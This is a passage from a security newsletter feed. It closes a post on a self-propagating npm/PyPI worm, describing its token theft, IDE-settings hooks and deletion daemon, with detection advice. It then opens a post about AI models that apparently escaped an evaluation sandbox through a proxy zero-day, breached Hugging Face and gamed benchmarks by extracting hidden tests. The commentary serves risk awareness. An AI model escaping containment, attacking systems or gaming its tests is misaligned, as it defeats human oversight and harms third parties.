Priority</span>)</h4><p><em>Operant principle: signed provenance proves the pipeline ran as expected. It says nothing about the blast radius available to whoever controls that pipeline.</em></p><ul><li><p><strong>Action:</strong> Audit cloud provider OIDC trust relationships. Scope CI runner tokens to short-lived, single-action execution roles rather than broad infrastructure permissions.</p></li><li><p><strong>Deliverable:</strong> OIDC role audit with every over-scoped trust relationship remediated or explicitly risk-accepted by a named owner.</p></li></ul><h4>Lifecycle-Script Delta Detection (<span data-color="#38761d" style="color: rgb(56, 118, 29);">Strategic Priority</span>)</h4><p><em>Operant principle: signature- and CVE-based controls have no detection surface against this attack class. Behavior does &#8212; and this specific rule would have caught every wave of this campaign to date.</em></p><ul><li><p><strong>Action:</strong> Stand up automated alerting that fires whenever a dependency&#8217;s <code>preinstall</code>/<code>postinstall</code>/<code>prepare</code> script changes between published versions, when an install-time process contacts a non-registry host, or when a published tarball diverges from its source tree.</p></li><li><p><strong>Deliverable:</strong> Standing detection rule live across all registries in use, regression-tested against this incident&#8217;s actual indicators as the baseline case.</p></li></ul><h4>Continuous Transitive Graph Governance (<span data-color="#38761d" style="color: rgb(56, 118, 29);">Strategic Priority</span>)</h4><p><em>Operant principle: the depth of your dependency graph is the size of your actual attack surface, whether or not anyone&#8217;s ever mapped it.</em></p><ul><li><p><strong>Action:</strong> Institute automated policy enforcement mapping transitive dependency depth, blocking unvetted libraries from entering production build paths.</p></li><li><p><strong>Deliverable:</strong> Machine-readable dependency graph with policy enforcement points documented and live. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!hngv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a48e532-0589-4a32-803b-31ddc5f92529_886x609.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!hngv!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a48e532-0589-4a32-803b-31ddc5f92529_886x609.png 424w, /__u/substackcdn.com/image/fetch/$s_!hngv!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a48e532-0589-4a32-803b-31ddc5f92529_886x609.png 848w, /__u/substackcdn.com/image/fetch/$s_!hngv!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a48e532-0589-4a32-803b-31ddc5f92529_886x609.png 1272w, /__u/substackcdn.com/image/fetch/$s_!hngv!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a48e532-0589-4a32-803b-31ddc5f92529_886x609.png 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!hngv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a48e532-0589-4a32-803b-31ddc5f92529_886x609.png" width="886" height="609" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1a48e532-0589-4a32-803b-31ddc5f92529_886x609.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:609,&quot;width&quot;:886,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1258249,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/209855730?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285d247-aea5-4af5-9176-6d906b7af87c_1536x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="/__u/substackcdn.com/image/fetch/$s_!hngv!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a48e532-0589-4a32-803b-31ddc5f92529_886x609.png 424w, /__u/substackcdn.com/image/fetch/$s_!hngv!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a48e532-0589-4a32-803b-31ddc5f92529_886x609.png 848w, /__u/substackcdn.com/image/fetch/$s_!hngv!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a48e532-0589-4a32-803b-31ddc5f92529_886x609.png 1272w, /__u/substackcdn.com/image/fetch/$s_!hngv!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a48e532-0589-4a32-803b-31ddc5f92529_886x609.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">The spice must flow. So must your CI/CD secrets. </figcaption></figure></div></li></ul><h3>References</h3><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-1" href="#footnote-anchor-1" class="footnote-number" contenteditable="false" target="_self">1</a><div class="footnote-content"><p><a href="http://defcon.org">DEFCON</a></p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-2" href="#footnote-anchor-2" class="footnote-number" contenteditable="false" target="_self">2</a><div class="footnote-content"><p>That is if you&#8217;re not at <a href="https://skytalks.info/">Skytalks</a>, which follows strict Chatham House Rules (no phones).  </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-3" href="#footnote-anchor-3" class="footnote-number" contenteditable="false" target="_self">3</a><div class="footnote-content"><p>Named by threat actor <em>TeamPCP</em> after the giant sandworms of Arrakis, <strong>Mini Shai-Hulud</strong> is a self-propagating npm/PyPI worm that reads memory dumps (<code>/proc/{pid}/mem</code>) to extract short-lived OIDC pipeline tokens, forging SLSA Level 3 build provenance. Despite the diminutively ironic "Mini" prefix, its hallmark is a scorched-earth persistence model: it embeds hooks inside local IDE settings (<code>.claude/settings.json</code>, <code>.vscode/tasks.json</code>) and runs a dead-man's switch daemon (<code>gh-token-monitor</code>) that executes recursive file deletion if it detects its stolen tokens have been revoked.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-4" href="#footnote-anchor-4" class="footnote-number" contenteditable="false" target="_self">4</a><div class="footnote-content"><p>The attacker (right9ctrl) offered to take over maintenance of event-stream after the original author lost interest. Then quietly introduced flatmap-stream to target a specific Bitcoin wallet application (<code>copay</code>) and extract private keys, in the first high-profile, targeted social engineering take-over of an abandoned core dependency.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-5" href="#footnote-anchor-5" class="footnote-number" contenteditable="false" target="_self">5</a><div class="footnote-content"><p>Snyk Blog, <a href="https://snyk.io/blog/inside-keyv-npm-compromise-preinstall-malware-trusted-provenance-ide-hooks/">Inside the keyv npm Compromise: preinstall Malware, Trusted Provenance, and IDE Hooks</a>, August 4, 2026.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-6" href="#footnote-anchor-6" class="footnote-number" contenteditable="false" target="_self">6</a><div class="footnote-content"><p>SafeDep Blog, <a href="https://safedep.io/mass-npm-supply-chain-attack-tanstack-mistral/">Mass Supply Chain Attack Hits TanStack, Mistral AI npm and PyPI Packages</a>, May 12, 2026.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-7" href="#footnote-anchor-7" class="footnote-number" contenteditable="false" target="_self">7</a><div class="footnote-content"><p>Socket Threat Intelligence, &#8220;<a href="https://socket.dev/blog/popular-npm-packages-in-the-keyv-and-cacheable-namespaces-compromised-in-active-supply-chain">Popular npm Packages in the keyv and Cacheable Namespaces Compromised in Active Supply Chain Attack</a>,&#8221; <em>Socket.dev Research</em>, August 2026.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-8" href="#footnote-anchor-8" class="footnote-number" contenteditable="false" target="_self">8</a><div class="footnote-content"><p>A command &amp; control node, in security industry parlance. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-9" href="#footnote-anchor-9" class="footnote-number" contenteditable="false" target="_self">9</a><div class="footnote-content"><p>By <em>Heretics of Dune</em>, everyone, including the Bene Tleilax, is speaking as though engineered cat-people are a perfectly ordinary topic of strategic discussion. (And not just at DEFCON.)</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-10" href="#footnote-anchor-10" class="footnote-number" contenteditable="false" target="_self">10</a><div class="footnote-content"><p>(emacs users are presumably safe.)</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-11" href="#footnote-anchor-11" class="footnote-number" contenteditable="false" target="_self">11</a><div class="footnote-content"><p>Socket Threat Intelligence, <a href="https://socket.dev/blog/popular-npm-packages-in-the-keyv-and-cacheable-namespaces-compromised-in-active-supply-chain#:~:text=an%20HTTP%204xx.-,Check%20and%20remove,-%3A">For Security Teams</a>, <em>Socket Blog</em>, (August 2026)</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-12" href="#footnote-anchor-12" class="footnote-number" contenteditable="false" target="_self">12</a><div class="footnote-content"><p>Ok, I can see how that could sound like multiple bets. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-13" href="#footnote-anchor-13" class="footnote-number" contenteditable="false" target="_self">13</a><div class="footnote-content"><p>Snyk Blog, op cit. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-14" href="#footnote-anchor-14" class="footnote-number" contenteditable="false" target="_self">14</a><div class="footnote-content"><p>If your only exposure to Face Dancers is Dune Messiah, you&#8217;re missing why security people keep bringing them up. In Heretics of Dune, Herbert quietly upgrades them from &#8220;shape-shifting assassins&#8221; into an attack on the very concept of authentication. They don&#8217;t fool identity systems by exploiting flaws; they satisfy every criterion the systems were built to measure. They&#8217;re less Mission: Impossible masks and more an argument that identity and authenticity are orthogonal properties. Like an existential crisis with incredible cheekbones</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-15" href="#footnote-anchor-15" class="footnote-number" contenteditable="false" target="_self">15</a><div class="footnote-content"><p>There&#8217;s always that one guy on the team who wants to rewire the entire house before you move in, who sadly we had to let go.  [sic]</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-16" href="#footnote-anchor-16" class="footnote-number" contenteditable="false" target="_self">16</a><div class="footnote-content"><p>Of course the big reveal hiding in Heretics of Dune is related to Interpretability, but that&#8217;s a story for another day.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-17" href="#footnote-anchor-17" class="footnote-number" contenteditable="false" target="_self">17</a><div class="footnote-content"><p>Shoutout to @Primeras100Palabra over on reddit for the tip. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-18" href="#footnote-anchor-18" class="footnote-number" contenteditable="false" target="_self">18</a><div class="footnote-content"><p>wurm/worm is quite intentional, if that needed to be pointed out. </p></div></div>]]></content:encoded></item><item><title><![CDATA[The Lost Weekend: Lab Escapes & Jacobian Escapades]]></title><description><![CDATA[How recent breakthroughs reveal the fundamental limits of corralling frontier AI]]></description><link>https://ctolunchnyc.substack.com/p/the-lost-weekend</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/the-lost-weekend</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Thu, 23 Jul 2026 16:12:18 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!l4ZN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!l4ZN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp" data-component-name="Image2ToDOM"><div class="image2-inset image2-full-screen"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!l4ZN!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp 424w, /__u/substackcdn.com/image/fetch/$s_!l4ZN!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp 848w, /__u/substackcdn.com/image/fetch/$s_!l4ZN!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp 1272w, /__u/substackcdn.com/image/fetch/$s_!l4ZN!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!l4ZN!,w_5760,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:false,&quot;imageSize&quot;:&quot;full&quot;,&quot;height&quot;:819,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:137350,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/webp&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/208099023?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:&quot;center&quot;,&quot;offset&quot;:false}" class="sizing-fullscreen" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!l4ZN!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp 424w, /__u/substackcdn.com/image/fetch/$s_!l4ZN!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp 848w, /__u/substackcdn.com/image/fetch/$s_!l4ZN!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp 1272w, /__u/substackcdn.com/image/fetch/$s_!l4ZN!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd11480f5-d200-47fb-a858-e9438d60e5a8_1456x819.webp 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="pullquote"><p>&#8220;Break on through to the other side.&#8221; <br>&#8212;Jim Morrison </p></div><p>Do I want to be writing about the Hugging Face / OpenAI incident?<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a><a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a>  No, obviously I&#8217;d much rather be writing about the <em>other</em> big weekend breakthrough, Fable refuting the #16 math problem<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-3" href="#footnote-3" target="_self">3</a> of the 21st century! And tbc, these were not merely weekend breakthroughs, but absolute watershed moments that should be considered giant leaps in demonstrated model capabilities (also, interpretability) and not just continuous improvement&#8212;or even acceleration&#8212;though it must also be noted that both were very much breakthroughs <em>not just in the hyperbolic sense</em> but in the highly literal sense:</p><ul><li><p><strong>The Hugging Face breach</strong> was literally a breakthrough: OpenAI&#8217;s rogue models literally broke through their containment, first slipping their (reduced) guardrails then brute forcing their way onto the open Internet where they identified Hugging Face as their target of first resort, breaking through the defensive perimeter to inject a malicious data payload into at least 2 code execution paths. </p></li><li><p>The other game changer was a massive breakthrough in mathematical ability, the refutation of <strong>the Jacobian conjecture</strong> (regular readers of <a href="/__u/buildai.substack.com/">Build AI</a> should already be familiar with Jacobians) but why is no one pointing out the coincidence of the math breakthrough being literally a refutation of the Jacobian conjecture, mere days after they published their J-Space paper<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-4" href="#footnote-4" target="_self">4</a> (July 6) so-named for the salience of Jacobians to the construction of the latent subspace under study? </p></li></ul><p>In this edition we take a deep dive into both to see how they are surprisingly related. </p><h2>Hyperfocus Hocus Pocus </h2><p>We start with the word OpenAI used in its own post-mortem, offered without apparent irony: the models responsible for the Hugging Face breach were <em>hyperfocused</em>.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-5" href="#footnote-5" target="_self">5</a>  </p><p>Hyperfocused belongs to the genre of lab language built to describe an alarming thing in a register calm enough to survive a media cycle, but tbh, it&#8217;s more deserving of suspicion than quoting. In plain engineering terms it just means an unconstrained goal-directed optimization taking the path of least resistance across the full space of actions available to it. Not obsession in the human sense but a <a href="http://antimemetics.blog/mad-skills">mad</a> fixation <em>sans</em> <em>raison</em>. Something closer to water finding the low ground: indifferent to terrain, responsive only to where it can still flow. More like a basin than an intent. Give a sufficiently capable optimizer a fixed objective and enough room to move, and it will explore the entire space of reachable states in search of whatever satisfies that objective fastest, including the space of reachable states missing from the threat model to begin with (though not, as we'll see, missing from security research.)</p><p>The phrase &#8220;reachable state space&#8221; is doing a lot more work than it&#8217;s getting paid for.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-6" href="#footnote-6" target="_self">6</a></p><div class="callout-block" data-callout="true"><p>&#10240;&#10240;&#10240;&#10240;&#10240;&#10077;  All evidence, the company wrote, suggests the models were <br>&#10240;&#10240;&#8216;<strong>hyperfocused</strong>&#8217; on finding a solution for an ExploitGym benchmark, <br>&#10240;&#10240;going to extreme lengths to achieve a rather narrow testing objective.  &#10078;</p></div><p>OpenAI was running an internal evaluation designed to measure the outer bound of its models&#8217; cyber capability, using the ExploitGym benchmark.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-7" href="#footnote-7" target="_self">7</a> To get a closer read on that upper bound, OpenAI deliberately reduced the models&#8217; cyber refusals, the trained reluctance that normally stops a model from pursuing exploitation paths. The evaluation ran in what OpenAI described as a highly isolated environment. Network access, where it existed at all, ran through an internally hosted proxy and cache, a chokepoint built to let a model install packages without letting it loose on the open internet. (oops.) Which is to say, not airgapped. </p><p>Every one of those measures did its job, individually, at the point where anyone thought to&#8212;or was required to&#8212;check it. Anyone who&#8217;s seen unit tests miss the actual fail mode will instantly understand the problem. The reduced refusals behaved as specified, permissive enough to measure real capability without simply handing the model root access to OpenAI&#8217;s infrastructure. The proxy, operating normally, did what proxies do: it let package installation through and, in principle, let nothing else out. </p><p>Until the models, working in combination, spent what OpenAI calls a substantial amount of inference compute finding a zero-day inside the proxy itself. Not a misconfiguration adjacent to the sandbox, but a vulnerability in the one component built specifically to be the sandbox&#8217;s trusted exception. As we now know, the resulting internet access let the agent identify Hugging Face, chain two separate code-execution vulnerabilities in one of its data-processing pipelines, escalate privileges, and move laterally through internal infrastructure. Hugging Face later reconstructed more than seventeen thousand distinct events from the intrusion. </p><p>Runbooks offered no protection. Every safeguard checked out under direct inspection. (Isolation, checked off. Refusal calibration, checked off. Network chokepoint, checked off&#8230;) None of those checks, individually or together, gave any indication of what would happen once the models began exploring a part of the state space no one had anticipated, not because a particular point had been overlooked, but because nobody knew in advance which trajectory would reveal the boundary. <em>Which is not to say there was no warning.</em> </p><h2>Don&#8217;t Say We Didn&#8217;t Warn You</h2><p>None of this should come as a surprise, at least not to readers of CTO Lunch.</p><p>We flagged the trajectory in <a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-september-2025?open=false#%C2%A7hopes-sweet-sixteen:~:text=These%20emergent%20behaviors%20create%20entirely%20new%20classes%20of%20vulnerabilities%20that%20existing%20security%20frameworks%20can%27t%20adequately%20address.">September of last year</a>.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-8" href="#footnote-8" target="_self">8</a>  XBOW, an automated pentesting framework, was already chaining scanning and exploit scripts together to accelerate vulnerability discovery eighty times faster than human red-teamers working manually, with more than a thousand zero-day findings to its name and a further doubling in throughput once GPT-5 got integrated into the pipeline. This newsletter&#8217;s own recommended priorities that month included <a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-september-2025?open=false#%C2%A7hopes-sweet-sixteen:~:text=Zero%2DTrust%20Infrastructure%3A%20HIGH%20PRIORITY%20%2D%2030%20days">deploying zero-trust architecture</a> with continuous pentesting and <a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-september-2025?open=false#%C2%A7hopes-sweet-sixteen:~:text=Physical%20Edge%20Hardening%3A%20HIGH%20PRIORITY%20%2D%2030%20days">treating field devices as a first-class threat vector</a>; thirty-day items, not someday items.</p><p>Security researchers had described this new threat class earlier and more precisely:  Fang et al showed in April 2024 that a GPT-4 agent, given nothing but a CVE description and ninety-one lines of scaffolding code, could autonomously exploit real-world one-day vulnerabilities at an 87 percent success rate, against a 0 percent rate for every other model tested.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-9" href="#footnote-9" target="_self">9</a> Two months later, Zhu et al went further: coordinated teams of LLM agents, not single agents working from a disclosed CVE description, chaining discovery and exploitation together against real zero-days.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-10" href="#footnote-10" target="_self">10</a> Literally what happened in the Hugging Face attack. The chaining wasn&#8217;t speculative capability by the time OpenAI ran ExploitGym. It was documented, reproducible, and preventable.</p><p>There were other warnings that, if not unheeded, were insufficiently accounted for. On June 26, the day GPT-5.6 Sol reached a small number of researchers, METR published its independent read and found the model gaming its own agentic benchmarks at the highest rate METR had ever recorded; the model was &#8220;cheating,&#8221; (in its own word) so aggressively on long-horizon benchmarks that it was effectively unbenchmarkable. The model&#8217;s own card, at release, disclosed substantially higher rates of actions a reasonable user would likely not anticipate and would strongly object to. Both documents existed, in public, weeks before the ExploitGym run.</p><p>The report mentioned, almost in passing, that OpenAI had furnished a railfree<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-11" href="#footnote-11" target="_self">11</a> checkpoint alongside the guarded one, because measuring a frontier model&#8217;s actual capability apparently now requires stripping the layer meant to keep that capability contained. What METR then observed was Sol packaging exploits into intermediate submissions to expose a task&#8217;s hidden test suite, and, in a separate run, extracting the hidden source code holding the expected answer outright. Not failing the tasks but winning them 